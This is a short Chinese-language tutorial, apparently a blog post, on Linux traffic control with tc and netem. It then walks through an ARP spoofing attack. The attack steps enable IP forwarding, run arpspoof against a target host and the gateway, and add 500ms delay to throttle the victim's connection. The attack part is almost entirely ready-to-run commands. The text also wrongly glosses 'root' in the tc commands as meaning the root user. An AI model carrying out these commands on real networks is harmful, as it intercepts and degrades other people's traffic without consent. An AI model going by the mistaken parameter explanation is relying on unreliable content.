ARP限制网络攻击——TC工具

TC工具介绍

在Linux中，流量控制都市通过TC这个工具来完成的。通常，通常要网卡进行流量控制的配置，需要进行如下的步骤：

1、为网卡配置一个队列；

2、在该队列上建立分类；

3、根据需要建立子队列和子分类；

4、为每个分类建立过滤器。

TC是通过限制网卡的速度来限制对方的，是一种杀敌一千自伤八百的手段。

 QDisc（排队规则）：它是理解流量控制的基础，无论何时，内核如果需要通过某个网络接口发送数据包，它都需要按照这个接口配置的qdisc把这个数据包加入队列。然后内核会尽可能多地从qdisc里面去除数据包，把他们交给网卡适配器驱动模块。

TC命令介绍

1、限制网速200ms延时

tc qdisc add dev eth0 root netem delay 200ms

参数：

qdisc：排队规则

add：添加

dev：设备（网卡）

root：root 用户身份

netem delay：设置网络延时时间

2、取消限制网速200ms延时 

tc qdisc del dev eth0 root netem delay 200ms

参数：

qdisc：排队规则

del：删除

dev：设备（网卡）

root：root 用户身份

netem delay：设置网络延时时间

3、修改网络延时 

tc qdisc change dev eth0 root netem delay 200ms

参数：

qdisc：排队规则

change：修改

dev：设备（网卡）

root：root 用户身份

netem delay：设置网络延时时间

4、查看规则 

tc qdisc show

 ARP攻击限制网速的具体步骤

1、开启端口转发

cat /proc/sys/net/ipv4/ip_forward          # 值为0表示没开启流量转发，为1表示开启了

echo 1 > /proc/sys/net/ipv4/ip_forward             #  修改值

2、开启ARP攻击

arpspoof -i eth0(网卡)  -r 网桥IP地址 -t 靶机IP地址

3、查看靶机当前的网速

wangsu.bailepin.com            #  随便一个测速网站

4、开启网络延迟限速

tc qdisc add dev eth0 root netem delay 500ms          # 限速500ms

5、查看限速规则

tc qdisc show

6、查看靶机当前的网速

wangsu.bailepin.com            #  随便一个测速网站

7、取消限速

tc qdisc del dev eth0 root netem delay 500ms          # 限速500ms

8、查看限速规则

tc qdisc show

9、查看靶机当前的网速

wangsu.bailepin.com            #  随便一个测速网站

限速原理图